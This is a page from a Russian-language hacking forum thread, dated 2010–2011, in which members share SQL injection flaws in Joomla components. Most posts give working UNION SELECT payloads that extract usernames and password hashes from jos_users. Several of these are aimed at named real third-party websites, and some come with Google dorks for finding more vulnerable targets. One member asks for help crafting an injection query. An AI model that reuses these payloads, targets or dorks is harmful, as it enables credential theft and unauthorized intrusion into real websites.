HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #191  
Старый 11.08.2010, 00:35
Platon
Познающий
Регистрация: 05.01.2009
Сообщений: 32
Провел на форуме:
146971

Репутация: 12
По умолчанию

Keltos - да, понимаю, просто пока я не столь подкован чтобы раскрутить самостоятельно SQL inj. - попросил помощи(составить запрос к SQL).
 
Ответить с цитированием

  #192  
Старый 08.09.2010, 19:47
nakurukataоm
Guest
Сообщений: n/a
Провел на форуме:
5079

Репутация: 0
По умолчанию

Цитата:
Сообщение от usasoft  
usasoft said:
1.5.10 - 1.5.15
А точнее никак нельзя?=)

В общем если кому понадобиться, это версия 1.5.15
 
Ответить с цитированием

  #193  
Старый 27.10.2010, 16:12
stmc
Новичок
Регистрация: 22.04.2010
Сообщений: 2
Провел на форуме:
4959

Репутация: 0
По умолчанию

Код:
Code:
Joomla Component com_phocagallery SQL injection Vulnerability
сомнительная уязвимость, учитывая, что

Код:
Code:
$Itemid = JRequest::getInt( 'Itemid');
 
Ответить с цитированием

  #194  
Старый 06.12.2010, 10:23
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

Наверное надо оживить тему?-)

Компонент: com_storedirectory

Тип: Sql-Inj

Уязвимость в параметре id:

PoC:

http://www.cockburngateway.com.au/index.php?option=com_storedirectory&task=view&id=1 +union+select+1,2,concat%28username,0x3a,password, 0x3a,usertype%29,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21+from+jos_users--
 
Ответить с цитированием

  #195  
Старый 06.12.2010, 18:53
Metis
Новичок
Регистрация: 29.11.2008
Сообщений: 6
Провел на форуме:
177127

Репутация: 29
По умолчанию

Joomla 1.5-xx

com_congratulations

index.php?option=com_congratulations&Itemid=1&task =date&y=2010&m=1+UNION+SELECT+AES_DECRYPT(AES_ENCR YPT(CONCAT((SELECT+TABLE_NAME+FROM+INFORMATION_SCH EMA.TABLES+limit+1,1)),0x71),0x71)--

http://school29.kurgan.cc/index.php?option=com_congratulations&Itemid=1&task =date&y=2010&m=1+UNION+SELECT+AES_DECRYPT(AES_ENCR YPT(CONCAT((SELECT+CONCAT_WS(0x3a,username,passwor d)+FROM+jos_users+limit+1,1)),0x71),0x71)--
 
Ответить с цитированием

  #196  
Старый 14.12.2010, 22:20
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

SQL inj в компоненте com_jeformcr

Доброго времени суток

SQl-Inj в com_jeformcr

Уязвимый параметр: id

Подбор кол-ва колонок через order+by

PoC:

http://www.rcreventos.com.br/rcr/index.php?option=com_jeformcr&view=form&id=-1+union+select+1,2,concat(username,0x3a,password), 4,5,6,7,8,9,10,11+from+jos_users+where+usertype='S uper%20Administrator'--

http://jrfu.org/index.php?option=com_jeformcr&view=form&id=-1+union+select+1,concat(username,0x3a,password),3, 4,5,6,7,8,9,10,11+from+jos_users+where+usertype='S uper%20Administrator'--
 
Ответить с цитированием

  #197  
Старый 02.01.2011, 02:40
JOSSe7
Guest
Сообщений: n/a
Провел на форуме:
1686

Репутация: 0
По умолчанию

Уязвимость: SQL Injection Vulnerability

Компонент: com_idoblog

Dork: inurl:"com_idoblog"

Language: php

http://extensions.joomla.org/extensions/news-production/blog/9218

Exploit:

http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1 337&userid=62+union+select+1,2,concat%28username,0 x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13 ,14,15,16+from+jos_users--
 
Ответить с цитированием

  #198  
Старый 19.01.2011, 01:09
usr-bin
Guest
Сообщений: n/a
Провел на форуме:
8038

Репутация: 5
По умолчанию

Уязвимость: Blind SQL Injection Vulnerability

Компонент: allCineVid

Dork: inurl:"com_allcinevid"

Language: php

http://www.joomtraders.com

Exploit:

http://site/path/index.php?option=com_allcinevid&tmpl=component&id= 1 and 1=1

http://site/path/index.php?option=com_allcinevid&tmpl=component&id= 1 and 1=0
 
Ответить с цитированием

  #199  
Старый 24.01.2011, 23:56
usr-bin
Guest
Сообщений: n/a
Провел на форуме:
8038

Репутация: 5
По умолчанию

Уязвимость: Multiple SQL Injection Vulnerability

Компонент: Portfolio

Dork: inurl:"com_allcinevid"

Language: php

http://www.salvatorefresta.net

Exploit:

http://site/path/index.php?option=com_b2portfolio&c=-1 UNION SELECT 1,concat(username,0x34,password),3,4,5 FROM jos_users
 
Ответить с цитированием

  #200  
Старый 15.02.2011, 02:22
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350

Репутация: 0
По умолчанию

Joomla active XSS JFilterInput

Наличие эксплоита: Да

Активная XSS в Joomla версии 1.6 и более ранних. Уязвимость связана с недостаточной

фильтрацией входных данных в классе JFilterInput.

В версии 1.6, к примеру, можно проверить при включенном модуле Userrofile, вбив в поле About Me

следующий код:

Код:
Code:
В остальных случаях и версиях данной уязвимости подвержен любой модуль который принимает данные от пользователя.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
Обзор бесплатных Cms em00s7 PHP 16 03.07.2009 13:13
Cms Cawabunga PHP 20 05.08.2007 00:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ